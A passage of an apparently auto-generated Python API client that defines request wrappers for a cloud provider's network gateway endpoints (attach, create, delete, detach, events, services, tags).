project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['networking_project_netgw_attach'] = \
networking_project_netgw_attach
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_attach = _Endpoint(
settings={
'response_type': (Netgw,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/actions/attach',
'operation_id': 'networking_project_netgw_attach',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'networking_project_netgw_attach',
'x_idempotency_key',
'x_dry_run',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'networking_project_netgw_attach',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'networking_project_netgw_attach':
(NetworkingProjectNetgwAttach,),
'x_idempotency_key':
(str,),
'x_dry_run':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
'x_idempotency_key': 'x-idempotency-key',
'x_dry_run': 'x-dry-run',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'networking_project_netgw_attach': 'body',
'x_idempotency_key': 'header',
'x_dry_run': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__networking_project_netgw_attach
)
def __networking_project_netgw_create(
self,
project_id,
location_id,
networking_project_netgw_create,
**kwargs
):
"""Create networking/netgw # noqa: E501
Create netgw # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_create(project_id, location_id, networking_project_netgw_create, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
networking_project_netgw_create (NetworkingProjectNetgwCreate):
Keyword Args:
x_idempotency_key (str): Idempotency key. [optional]
x_dry_run (str): Dry run. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
                    should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
                    should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Netgw
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['networking_project_netgw_create'] = \
networking_project_netgw_create
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_create = _Endpoint(
settings={
'response_type': (Netgw,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw',
'operation_id': 'networking_project_netgw_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'networking_project_netgw_create',
'x_idempotency_key',
'x_dry_run',
],
'required': [
'project_id',
'location_id',
'networking_project_netgw_create',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'networking_project_netgw_create':
(NetworkingProjectNetgwCreate,),
'x_idempotency_key':
(str,),
'x_dry_run':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'x_idempotency_key': 'x-idempotency-key',
'x_dry_run': 'x-dry-run',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'networking_project_netgw_create': 'body',
'x_idempotency_key': 'header',
'x_dry_run': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__networking_project_netgw_create
)
def __networking_project_netgw_delete(
self,
project_id,
location_id,
netgw_id,
**kwargs
):
"""Delete networking/netgw # noqa: E501
Delete netgw # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_delete(project_id, location_id, netgw_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
                    should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
                    should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_delete = _Endpoint(
settings={
'response_type': None,
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}',
'operation_id': 'networking_project_netgw_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_delete
)
def __networking_project_netgw_detach(
self,
project_id,
location_id,
netgw_id,
**kwargs
):
"""Detach networking/netgw # noqa: E501
action detach # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_detach(project_id, location_id, netgw_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
Keyword Args:
x_idempotency_key (str): Idempotency key. [optional]
x_dry_run (str): Dry run. [optional]
            _return_http_data_only (bool): response data without HTTP status
                code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Netgw
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_detach = _Endpoint(
settings={
'response_type': (Netgw,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/actions/detach',
'operation_id': 'networking_project_netgw_detach',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'x_idempotency_key',
'x_dry_run',
],
'required': [
'project_id',
'location_id',
'netgw_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'x_idempotency_key':
(str,),
'x_dry_run':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
'x_idempotency_key': 'x-idempotency-key',
'x_dry_run': 'x-dry-run',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'x_idempotency_key': 'header',
'x_dry_run': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_detach
)
def __networking_project_netgw_event_get(
self,
project_id,
location_id,
netgw_id,
event_id,
**kwargs
):
"""Get networking/netgw.event # noqa: E501
Get networking/netgw.event # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_event_get(project_id, location_id, netgw_id, event_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
event_id (str): eventId
Keyword Args:
            _return_http_data_only (bool): response data without HTTP status
                code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Event
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['event_id'] = \
event_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_event_get = _Endpoint(
settings={
'response_type': (Event,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/event/{eventId}',
'operation_id': 'networking_project_netgw_event_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'event_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'event_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'event_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
'event_id': 'eventId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'event_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_event_get
)
def __networking_project_netgw_event_list(
self,
project_id,
location_id,
netgw_id,
**kwargs
):
"""List networking/netgw.event # noqa: E501
List networking/netgw.event # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_event_list(project_id, location_id, netgw_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
Keyword Args:
limit (float): $limit. [optional] if omitted the server will use the default value of 100
skip (float): $skip. [optional]
            _return_http_data_only (bool): response data without HTTP status
                code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Event]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_event_list = _Endpoint(
settings={
'response_type': ([Event],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/event',
'operation_id': 'networking_project_netgw_event_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'limit',
'skip',
],
'required': [
'project_id',
'location_id',
'netgw_id',
],
'nullable': [
],
'enum': [
],
'validation': [
'limit',
]
},
root_map={
'validations': {
('limit',): {
'inclusive_maximum': 1000,
'inclusive_minimum': 1,
},
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'limit':
(float,),
'skip':
(float,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
'limit': '$limit',
'skip': '$skip',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'limit': 'query',
'skip': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_event_list
)
def __networking_project_netgw_get(
self,
project_id,
location_id,
netgw_id,
**kwargs
):
"""Get networking/netgw # noqa: E501
Returns a single netgw # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_get(project_id, location_id, netgw_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
Keyword Args:
            _return_http_data_only (bool): response data without HTTP status
                code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Netgw
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_get = _Endpoint(
settings={
'response_type': (Netgw,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}',
'operation_id': 'networking_project_netgw_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_get
)
def __networking_project_netgw_list(
self,
project_id,
location_id,
**kwargs
):
"""List networking/netgw # noqa: E501
List netgw # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_list(project_id, location_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
Keyword Args:
name (str): Filter by name. [optional]
tag_value (str): Filter by tag.value. [optional]
tag_key (str): Filter by tag.key. [optional]
            _return_http_data_only (bool): response data without HTTP status
                code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Netgw]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_list = _Endpoint(
settings={
'response_type': ([Netgw],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw',
'operation_id': 'networking_project_netgw_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'name',
'tag_value',
'tag_key',
],
'required': [
'project_id',
'location_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'name':
(str,),
'tag_value':
(str,),
'tag_key':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'name': 'name',
'tag_value': 'tag.value',
'tag_key': 'tag.key',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'name': 'query',
'tag_value': 'query',
'tag_key': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_list
)
def __networking_project_netgw_service_get(
self,
project_id,
location_id,
netgw_id,
service_id,
**kwargs
):
"""Get networking/netgw.service # noqa: E501
Get networking/netgw.service # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_service_get(project_id, location_id, netgw_id, service_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
service_id (str): serviceId
Keyword Args:
            _return_http_data_only (bool): response data without HTTP status
                code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ResourceService
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['service_id'] = \
service_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_service_get = _Endpoint(
settings={
'response_type': (ResourceService,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/service/{serviceId}',
'operation_id': 'networking_project_netgw_service_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'service_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'service_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'service_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
'service_id': 'serviceId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'service_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_service_get
)
def __networking_project_netgw_service_list(
self,
project_id,
location_id,
netgw_id,
**kwargs
):
"""List networking/netgw.service # noqa: E501
List networking/netgw.service # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_service_list(project_id, location_id, netgw_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
Keyword Args:
            _return_http_data_only (bool): response data without HTTP status
                code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[ResourceService]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_service_list = _Endpoint(
settings={
'response_type': ([ResourceService],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/service',
'operation_id': 'networking_project_netgw_service_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_service_list
)
def __networking_project_netgw_tag_create(
self,
project_id,
location_id,
netgw_id,
tag,
**kwargs
):
"""Create networking/netgw.tag # noqa: E501
Create networking/netgw.tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_tag_create(project_id, location_id, netgw_id, tag, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
tag (Tag):
Keyword Args:
            _return_http_data_only (bool): response data without HTTP status
                code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Tag
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['tag'] = \
tag
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_tag_create = _Endpoint(
settings={
'response_type': (Tag,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/tag',
'operation_id': 'networking_project_netgw_tag_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'tag',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'tag',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'tag':
(Tag,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'tag': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__networking_project_netgw_tag_create
)
def __networking_project_netgw_tag_delete(
self,
project_id,
location_id,
netgw_id,
tag_id,
**kwargs
):
"""Delete networking/netgw.tag # noqa: E501
Delete networking/netgw.tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_tag_delete(project_id, location_id, netgw_id, tag_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
tag_id (str): tagId
Keyword Args:
            _return_http_data_only (bool): response data without HTTP status
                code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
